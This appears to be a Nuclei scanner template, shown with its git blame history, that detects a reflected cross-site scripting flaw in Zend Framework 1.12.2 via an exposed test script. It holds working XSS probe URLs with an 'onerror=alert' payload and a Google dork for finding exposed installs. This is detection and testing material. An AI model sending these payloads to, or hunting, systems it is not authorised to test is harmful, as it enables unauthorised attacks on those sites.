nuclei-templates/http/vulnerabilities/zend/zend-v1-xss.yaml

id: zend-v1-xss

info:
  name: ZendFramework 1.12.2 - Cross-Site Scripting
  author: c3l3si4n
  severity: medium
  description: |
    ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
  reference:
    - https://twitter.com/c3l3si4n/status/1600035722148212737
  classification:
    cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zend
    product: zend_framework
    google-query: inurl:"/tests/Zend/Http/"
  tags: zend,zendframework,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"redirection"]'
          - '"param"'
          - '<img/src=x onerror=alert(document.domain)'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402204fac4d04a860da709b79c8383ab7f476a86fdabd2ca2a7e112be8963d552f41b02205fe70d64962747f875466681c335ca9edbcb776bfe317071ea17bad4ba8fb241:922c64590222798bb761d5b6d8e72950
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`id: zend-v1-xss`

			`info:`
			`name: ZendFramework 1.12.2 - Cross-Site Scripting`
			`author: c3l3si4n`
			`severity: medium`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`description: \|`
			`ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`reference:`
			`- https://twitter.com/c3l3si4n/status/1600035722148212737`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00			`classification:`
			`cpe: cpe:2.3:a:zend:zend_framework:1.12.2:::::::*`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`vendor: zend`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00			`product: zend_framework`
			`google-query: inurl:"/tests/Zend/Http/"`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`tags: zend,zendframework,xss`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`- method: GET`
			`path:`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`- "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"`
			`- "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`stop-at-first-match: true`
templateman update 2023-10-14 11:27:55 +00:00
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update zend-v1-xss.yaml 2022-12-07 12:53:56 +00:00			`- '"redirection"]'`
			`- '"param"'`
			`- '<img/src=x onerror=alert(document.domain)'`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`condition: and`

			`- type: word`
			`part: header`
			`words:`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`- text/html`

			`- type: status`
			`status:`
			`- 200`
chore: sign templates 🤖 2024-09-12 05:14:01 +00:00			`# digest: 490a0046304402204fac4d04a860da709b79c8383ab7f476a86fdabd2ca2a7e112be8963d552f41b02205fe70d64962747f875466681c335ca9edbcb776bfe317071ea17bad4ba8fb241:922c64590222798bb761d5b6d8e72950`